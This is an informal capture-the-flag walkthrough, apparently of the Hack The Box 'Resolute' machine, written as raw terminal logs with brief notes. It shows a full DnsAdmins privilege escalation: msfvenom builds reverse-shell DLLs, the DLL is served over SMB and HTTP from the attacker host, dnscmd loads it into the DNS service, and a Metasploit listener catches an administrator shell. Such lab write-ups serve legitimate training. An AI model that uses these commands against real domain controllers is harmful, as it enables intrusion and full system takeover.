*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x7530 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe query dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 3504 FLAGS : *Evil-WinRM* PS C:\Users\ryan\Documents>
wil try multi handler instead of nc
Kept failing.
restartd the machine and trying again
msfvenom
└─$ sudo msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f dll > reboot.dll [sudo] password for kali: [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of dll file: 9216 bytes
download the dll to the pc
*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri http://10.10.14.20:8000/resolute.dll -OutFile resolute.dll -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/17/2023 3:17 AM 9216 reboot.dll *Evil-WinRM* PS C:\Users\ryan\Documents>
after a lot of murking around i gave up on the evil-wrm method of loading
from the evil-winrm prompt
new dll
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 --platform=windows -f dll > resolute.dll [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 9216 bytes ┌──(kali㉿kali)-[~/HTB/resolute]
will serve using smbserver.py
└─$ python3 ./smbserver.py share /home/kali/HTB/resolute/ Impacket v0.11.0 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.169,52573) [*] AUTHENTICATE_MESSAGE (\,RESOLUTE)
load to dns -- dnscmd resolute.megabank.local /config /serverlevelplugindll \10.10.14.20\share\resolute.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.14.20\share\resolute.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> sc.stop dns The term 'sc.stop' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + sc.stop dns + ~~~~~~~ + CategoryInfo : ObjectNotFound: (sc.stop:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 804 FLAGS : *Evil-WinRM* PS C:\Users\ryan\Documents>
metasploit listener
msf6 > use exploit/windows/x64/shell_reverse_tcp [-] No results from search [-] Failed to load module: exploit/windows/x64/shell_reverse_tcp msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > use exploit/windows/x64/shell_reverse_tcp [-] No results from search [-] Failed to load module: exploit/windows/x64/shell_reverse_tcp msf6 exploit(multi/handler) > set payload exploit/windows/x64/shell_reverse_tcp [-] The value specified for payload is not valid. msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp PAYLOAD => windows/x64/shell_reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.10.14.20LHOST => 10.10.14.20 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > Interrupt: use the 'exit' command to quit msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/shell_reverse_tcp): Name Current Se Required Description tting ---- ---------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '' , seh, thread, process, none ) LHOST 10.10.14.2 yes The listen add 0 ress (an inter face may be sp ecified) LPORT 4444 yes The listen por t Exploit target: Id Name -- ---- 0 Wildcard Target View the full module info with the info, or info -d command. msf6 exploit(multi/handler) > exploit
we get in!!
[*] Started reverse TCP handler on 10.10.14.20:4444 [*] Command shell session 1 opened (10.10.14.20:4444 -> 10.10.10.169:49850) at 2023-09-17 08:10:58 -0400 Shell Banner: Microsoft Windows [Version 10.0.14393] ----- C:\Windows\system32>ls
C:\Users\Administrator\Desktop>cat root.txt cat root.txt 'cat' is not recognized as an internal or external command, operable program or batch file. C:\Users\Administrator\Desktop>type root.txt type root.txt b0bd7a3c695fe7b68d3489ffd5f77848 C:\Users\Administrator\Desktop>